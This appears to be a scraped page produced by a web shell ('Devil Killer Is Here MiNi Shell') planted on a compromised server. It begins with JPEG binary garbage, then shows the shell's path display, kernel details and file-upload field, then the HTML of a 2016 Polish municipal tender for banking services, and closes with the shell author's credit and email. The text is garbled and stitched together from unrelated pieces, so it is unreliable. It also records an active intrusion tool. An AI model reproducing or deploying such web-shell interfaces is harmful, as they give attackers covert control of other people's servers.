JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160401/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160401/73662-N-2016.html

<p class="kh_header"><b>Naruszewo: Kompleksowa obsługa bankowa budżetu Gminy Naruszewo oraz jednostek organizacyjnych przez okres 4 lat</b><br>
<b>Numer ogłoszenia: 73662 - 2016; data zamieszczenia: 01.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Naruszewo , Naruszewo 19A, 09-152 Naruszewo, woj. mazowieckie, tel. 23 663 10 51, faks 23 663 10 51 wew. 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.ugnaruszewo.bip.org.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa obsługa bankowa budżetu Gminy Naruszewo oraz jednostek organizacyjnych przez okres 4 lat.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Opis przedmiotu zamówienia:

1)	Kompleksowa obsługa bankowa budżetu Gminy Naruszewo oraz jednostek organizacyjnych przez okres 4 lat.
2)	Wielkość i zakres zamówienia: 
a)	liczba rachunków: 35, 
b)	szacunkowa roczna kwota wpłat gotówkowych do banku: 2 000 000,00 zł,
c)	szacunkowa roczna kwota wypłat gotówkowych z banku: 4 260 000,00 zł, 
d)	szacunkowa liczba przelewów w skali roku na rachunki w oddziałach wykonawcy: 4 800 szt., 
e)	szacunkowa liczba przelewów w skali roku na rachunki w innych bankach; 10 400 szt. 

UWAGA: Podana ilość rachunków bankowych jest ilością przewidywaną i może być zmieniona w zależności od potrzeb Zamawiającego. Zmiana liczby rachunków w trakcie realizacji umowy (zamkniecie i otwarcie rachunków) wymaga potwierdzenia pisemnego i nie wymaga aneksu do niniejszej umowy.

3)	Bank nie będzie pobierał od Gminy Naruszewo oraz jej jednostek gminnych innych niż zaproponowane w ofercie, opłat i prowizji za wykonywanie czynności wymienionych w zamówieniu. 
4)	Jeżeli w trakcie trwania umowy powstaną lub będą przekazane Gminie inne jednostki organizacyjne, zostaną one włączone do tej usługi bez dodatkowych opłat. Zmiana ilości rachunków bankowych oraz form organizacyjnych jednostek powiązanych z budżetem Gminy, nie spowoduje zmiany opłaty zaproponowanej w ofercie. 
5)	Warunkiem udziału w postępowaniu jest posiadanie bądź utworzenie placówki bankowej usytuowanej w miejscowości Naruszewo o strukturze oddziału bądź filii, pozwalającej na kompleksową i sprawną obsługę. Utworzenie oddziału bądź filii powinno nastąpić nie później niż do dn. 30 czerwca 2016 r. 
6)	Placówka bankowa winna być czynna w godzinach umożliwiających sprawne korzystanie z usług.

2.	W zakresie bieżącej obsługi bankowej zamówienie obejmuje: 

1)	Otwarcie i prowadzenie rachunków podstawowych i pomocniczych Gminy Naruszewo oraz gminnych jednostek organizacyjnych, takich jak: 
a)	Gminny Ośrodek Pomocy Społecznej w Naruszewie, 
b)	Gminna Biblioteka Publiczna w Naruszewie, 
c)	Zespół Obsługi Placówek Oświatowych w Naruszewie, 
d)	Zespół Szkół w Naruszewie, 
e)	Zespół Szkół w Nacpolsku, 
f)	Szkoła Podstawowa w Krysku, 
g)	Szkoła Podstawowa w Radzyminku, 
h)	Szkoła Podstawowa w Zaborowie. 
2)	Środki pieniężne na rachunkach bieżących i pomocniczych: wysokość oprocentowania będzie ustalana na podstawie stawki WIBID 1M z ostatniego roboczego dnia miesiąca poprzedzającego dany miesiąc odsetkowy plus minus marża określona w złożonej przez Bank ofercie. Zmiana oprocentowania będzie obowiązywać od pierwszego roboczego dnia miesiąca. Marża Banku jest stała w całym okresie trwania umowy. Stopa procentowa ustalana jest w stosunku rocznym, do obliczenia odsetek przyjmuje się, że rok liczy 365 dni. Kapitalizacja odsetek następować będzie w okresach miesięcznych, na koniec każdego miesiąca w ostatnim dniu kalendarzowym. UWAGA: Zamawiający zastrzega, iż minimalne oprocentowanie nie może być niższe niż 0%.
3)	Możliwość otwarcia dodatkowych rachunków bieżących i pomocniczych w trakcie obowiązywania umowy w zależności od potrzeb na warunkach zadeklarowanych w ofercie. 
4)	Możliwość zamykania rachunków bankowych na pisemny wniosek Zamawiającego.
5)	Potwierdzenie otwarcia i zamknięcia rachunków bankowych. 
6)	Przyjmowanie wpłat na rachunki bankowe Gminy Naruszewo i jednostek organizacyjnych.
7)	Dokonywanie wypłat gotówkowych z rachunków bankowych Gminy Naruszewo i jednostek organizacyjnych.
8)	Wydawanie blankietów czekowych. 
9)	Przyjmowanie lokat typu over night: lokowanie wolnych środków na lokacie krótkoterminowej, przyjmowanie automatycznie lokaty typu over night z rachunku bieżącego budżetu Gminy w kwocie powyżej 200 000,00 zł, (przy czym kwota 200 000,00 zł, pozostaje nie przekazywaną na lokatę). Oprocentowanie określa się w oparciu o WIBID 1M (ustalony o godz. 11:00 w dniu założenia lokaty) +/- ?wskaźnik korekty, przy czym lokata typu over night będzie dokonywana, o ile oprocentowanie na tej lokacie będzie wyższe niż oprocentowanie rachunku bieżącego. 
10)	Przyjmowanie lokat terminowych jednomiesięcznych (1M): wysokość oprocentowania będzie ustalana na podstawie stawki WIBID 1M z ostatniego roboczego dnia miesiąca poprzedzającego dany miesiąc odsetkowy plus minus marża określona w złożonej przez Bank ofercie. Zmiana oprocentowania będzie obowiązywać od pierwszego roboczego dnia miesiąca. Marża Banku jest stała w całym okresie trwania umowy. Stopa procentowa ustalana jest w stosunku rocznym, do obliczenia odsetek przyjmuje się, że rok liczy 365 dni. Kapitalizacja odsetek następować będzie w okresach miesięcznych. UWAGA: Zamawiający zastrzega, iż minimalne oprocentowanie nie może być niższe niż 0%.
11)	Przyjmowanie lokat terminowych trzymiesięcznych (3M): Wysokość oprocentowania będzie ustalana na podstawie stawki WIBID 3M z ostatniego roboczego dnia miesiąca poprzedzającego dany miesiąc odsetkowy plus minus marża określona w złożonej przez Bank ofercie. Zmiana oprocentowania będzie obowiązywać od pierwszego roboczego dnia miesiąca. Marża Banku jest stała w całym okresie trwania umowy. Stopa procentowa ustalana jest w stosunku rocznym, do obliczenia odsetek przyjmuje się, że rok liczy 365 dni. Kapitalizacja odsetek następować będzie w okresach trzymiesięcznych. UWAGA: Zamawiający zastrzega, iż minimalne oprocentowanie nie może być niższe niż 0%.
12)	Udostępnienie usługi bankowości elektronicznej na stanowiskach komputerowych, wskazanych przez Zamawiającego, umożliwiającej dokonywanie przelewów elektronicznych oraz uzyskiwanie informacji o bieżącym stanie kont i obrotów w terminie do dn. 30 czerwca 2016 r. 
13)	Przekazywanie i instalowanie wersji aktualizacyjnych w okresie trwania umowy oraz świadczenie serwisu oprogramowania. Wykonawca powinien zapewnić instalację (uruchomienie) stanowisk elektronicznej bankowości oraz poprawne działanie oprogramowania bankowości elektronicznej na stanowiskach komputerowych wskazanych przez Gminę Naruszewo oraz jej poszczególne jednostki organizacyjne. Ponadto powinien dostarczyć wszelkie dodatkowe, niezbędne do pracy w systemie akcesoria, zarówno dla osób sporządzających dokumenty w systemie bankowości elektronicznej, jak i dla podpisujących w ilości wymaganej przez Zamawiającego. W ramach elektronicznej obsługi bankowej posiadacz rachunku będzie miał zapewnione w szczególności: 
a)	podłączenie do systemu elektronicznego każdego nowo otwartego rachunku w trakcie trwania umowy,
b)	uzyskiwanie na bieżąco wiadomości o wszystkich operacjach i saldach na rachunku bieżącym i rachunkach pomocniczych,
c)	tworzenie zbiorów danych rachunków, kontrahentów i innych danych ewidencyjnych, przeszukiwanie zbiorów wszystkich operacji na wszystkich rachunkach, 
d)	składanie poleceń przelewów, w tym poleceń przelewów do Zakładu Ubezpieczeń Społecznych i Urzędu Skarbowego, ze wszystkich rachunków w ramach dostępnych środków, 
e)	uzyskiwanie raportów o zrealizowanych operacjach, generowanie (wydruk) wyciągów nie wymagających stempla bankowego, 
f)	informację o odrzuceniu transakcji z podaniem komunikatu o jej przyczynie, 
g)	możliwość wykonywania operacji w tym samym czasie na różnych rachunkach bankowych jednostki przez jednego lub kilku użytkowników systemu, 
h)	przechowywanie wysyłanych przelewów w archiwum systemu, co najmniej przez okres 3 miesięcy od daty dokonania operacji, 
i)	przeszkolenie pracowników Zamawiającego z zakresu obsługi systemu, 
j)	umożliwienie użytkownikowi dysponowania podpisem elektronicznym, 
k)	możliwość sporządzenia wyciągu w formie elektronicznej, możliwość sprawdzenia obrotów i stanów na rachunkach bankowych w dowolnej chwili.
14)	Wydawanie opinii i zaświadczeń bankowych o prowadzonych rachunkach bankowych. 
15)	Sporządzanie historii do rachunku bankowego na prośbę Zamawiającego. 
16)	Prowadzenie rachunku obejmuje: 
a)	wykonywanie przelewów w formie elektronicznej wewnątrz banku pomiędzy rachunkami, 
b)	wykonywanie przelewów elektronicznych na zewnątrz do innych banków, 
c)	dokonywanie przelewów w formie papierowej, 
d)	sporządzanie wyciągów bankowych do wszystkich rachunków za każdy dzień, w którym dokonano operacji finansowej na danym rachunku, 
17)	Potwierdzenie realizacji przelewu w dniu przyjęcia do realizacji. 
18)	Zmiana karty wzorów podpisów. 
19)	Umożliwienie Zamawiającemu pobieranie opłat z tytułu kosztów związanych z funkcjonowaniem określonych przez Zamawiającego rachunków bankowych z innych wskazanych przez Zamawiającego rachunków bankowych, bez ponoszenia przez Zamawiającego dodatkowych opłat i prowizji. 
20)	Umożliwienie pracownikom Urzędu Gminy w Naruszewie i jednostek organizacyjnych Gminy Naruszewo uzyskiwania informacji telefonicznych o stanie salda oraz wszelkich operacjach dokonywanych na rachunkach bankowych danego dnia bez ponoszenia przez Zamawiającego dodatkowych opłat i prowizji.
21)	Dopisywanie odsetek bankowych do rachunków wszystkich jednostek organizacyjnych Gminy za miesiąc grudzień w dniu 31 grudnia oraz przeksięgowanie z tą samą datą środków zgromadzonych na rachunkach bankowych, ze wskazanych na podstawie pisma rachunków, na podstawowy rachunek budżetu Gminy. Za wymienioną usługę Bank nie będzie pobierał żadnych opłat ani prowizji. 
22)	Wypłata przyznanego stypendium socjalnego dla uczniów na podstawie zatwierdzonych do wypłaty list z wyodrębnionego przez Bank konta. Zamawiający określa termin realizacji świadczeń po przekazaniu środków finansowych. Bank przedkłada pisemną informację o zrealizowaniu zlecenia lub zwrocie niezrealizowanych wypłat. 
23)	Wypłata świadczeń zgodnie z dyspozycjami zawartymi na listach wypłat opracowanych przez pracowników Gminnego Ośrodka Pomocy Społecznej w Naruszewie. Wypłaty dokonywane będą z wyodrębnionego przez Bank konta. Zamawiający określa termin realizacji świadczeń po przekazaniu środków finansowych. Bank przedkłada pisemną informację o zrealizowaniu zlecenia lub zwrocie niezrealizowanych wypłat. 

3.	Dokumenty udostępnione do wglądu każdorazowo na życzenie Wykonawcy: 

1)	Sprawozdania z wykonania budżetu za rok 2014: Rb-27S, Rb-28S, Rb-NDS, Rb-N, Rb-Z. 
2)	Bilans za 2014 r. 
3)	Uchwała Budżetowa Gminy Naruszewo na rok 2016.
4)	Opinia RIO o przedłożonym projekcie uchwały budżetowej na 2016 rok.
5)	Stan posiadanych kredytów i pożyczek.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.11.00.00-4, 66.11.20.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2020.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga w niniejszym postępowaniu wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, że posiada zezwolenie Komisji Nadzoru Bankowego lub inny dokument uprawniający do wykonywania czynności bankowych, zgodnie z ustawą 
z dnia 29 sierpnia 1997 r. Prawo bankowe (Dz. U. z 2015 r. poz. 128 z poźn. zm.).

Ocena spełniania warunku przez Wykonawców zostanie dokonana metodą spełnia - nie spełnia na podstawie badania złożonego dokumentu, tj. złożony prawidłowo dokument żądany przez Zamawiającego - spełnia warunek, nie złożony z zastrzeżeniem art. 26 ust. 3 ustawy Pzp - nie spełnia warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie przedłożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp (Załącznik Nr 2 do SIWZ). 

Ocena spełniania warunku przez Wykonawców zostanie dokonana metodą spełnia - nie spełnia na podstawie badania złożonego dokumentu, tj. złożony prawidłowo dokument żądany przez Zamawiającego - spełnia warunek, nie złożony z zastrzeżeniem art. 26 ust. 3 ustawy Pzp - nie spełnia warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie przedłożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp (Załącznik Nr 2 do SIWZ). 

Ocena spełniania warunku przez Wykonawców zostanie dokonana metodą spełnia - nie spełnia na podstawie badania złożonego dokumentu, tj. złożony prawidłowo dokument żądany przez Zamawiającego - spełnia warunek, nie złożony z zastrzeżeniem art. 26 ust. 3 ustawy Pzp - nie spełnia warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie przedłożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp (Załącznik Nr 2 do SIWZ). 

Ocena spełniania warunku przez Wykonawców zostanie dokonana metodą spełnia - nie spełnia na podstawie badania złożonego dokumentu, tj. złożony prawidłowo dokument żądany przez Zamawiającego - spełnia warunek, nie złożony z zastrzeżeniem art. 26 ust. 3 ustawy Pzp - nie spełnia warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie przedłożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp (Załącznik Nr 2 do SIWZ). 

Ocena spełniania warunku przez Wykonawców zostanie dokonana metodą spełnia - nie spełnia na podstawie badania złożonego dokumentu, tj. złożony prawidłowo dokument żądany przez Zamawiającego - spełnia warunek, nie złożony z zastrzeżeniem art. 26 ust. 3 ustawy Pzp - nie spełnia warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oprócz dokumentów, oświadczeń wymienionych w Rozdziałach VIII oraz IX SIWZ należy złożyć: 
a)	formularz ofertowy (Załącznik Nr 1 do SIWZ),
b)	niezbędne pełnomocnictwa, jeżeli zostały udzielone, 
c)	zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - jeżeli dotyczy (Załącznik Nr 5 do SIWZ). Pisemne zobowiązanie powinno być złożone w formie oryginału</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Oprocentowanie środków na rachunkach bierzących - 10</li>
<li>3 - Wysokość oprocentowania lokaty over night - 10</li>
<li>4 - Oprocentowanie lokat terminowych 1M - 10</li>
<li>5 - Oprocentowanie lokat terminowych 3M - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, w formie aneksu do umowy, pod rygorem nieważności takiej zmiany, a konieczność wprowadzenia zmiany wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.
2.	Zamawiający dopuszcza zmianę, o której mowa wyżej, w odniesieniu do:
1)	wysokości wynagrodzenia w związku ze zmianą przepisów podatkowych,
2)	nałożenia na Zamawiającego dodatkowych zadań lub zmiany jego struktury organizacyjnej,
3)	pojawienia się nowych produktów bankowych lub rozwiązań organizacyjnych, których wykorzystanie będzie korzystne dla Zamawiającego,
4)	wprowadzenia modyfikacji bądź wymiany systemów informatycznych Zamawiającego, w tym systemu finansowo - księgowego,
5)	zmiany terminów płatności,
6)	zmiany przedstawicieli Wykonawcy lub Zamawiającego,
7)	Zamawiający dopuszcza możliwość zmiany umowy w sytuacji rozszerzenia kręgu podmiotów obsługiwanych przez Bank w ramach zawartej umowy, innych niż wymienione w przedmiocie zamówienia, których konieczność obsługi wystąpi w związku z realizacją zadań przez Gminę Naruszewo,
8)	Zamawiający dopuszcza możliwość zmiany umowy w sytuacji korzystniejszych opłat i prowizji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.ugnaruszewo.bip.org.pl/?tree=przetarg<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Naruszewie
Naruszewo 19A
09-152 Naruszewo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.04.2016 godzina 10:00, miejsce: Urząd Gminy w Naruszewie, Naruszewo 19A, 09 - 152 Naruszewo, powiat płoński, 
woj. mazowieckie, pokój nr 3 (sekretariat urzędu).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie nie jest finansowane ze środków Unii Europejskiej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com